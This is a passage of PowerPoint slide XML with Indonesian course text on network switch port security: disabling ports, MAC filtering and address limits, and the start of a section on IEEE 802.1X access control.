            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> MAC dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Adaptor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengkonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemfilteran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC yang valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC, switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>802.1 X dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Dapat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Diperluas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemalsuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IEEE 802.1X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Port-based Network Access Control (PNAC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
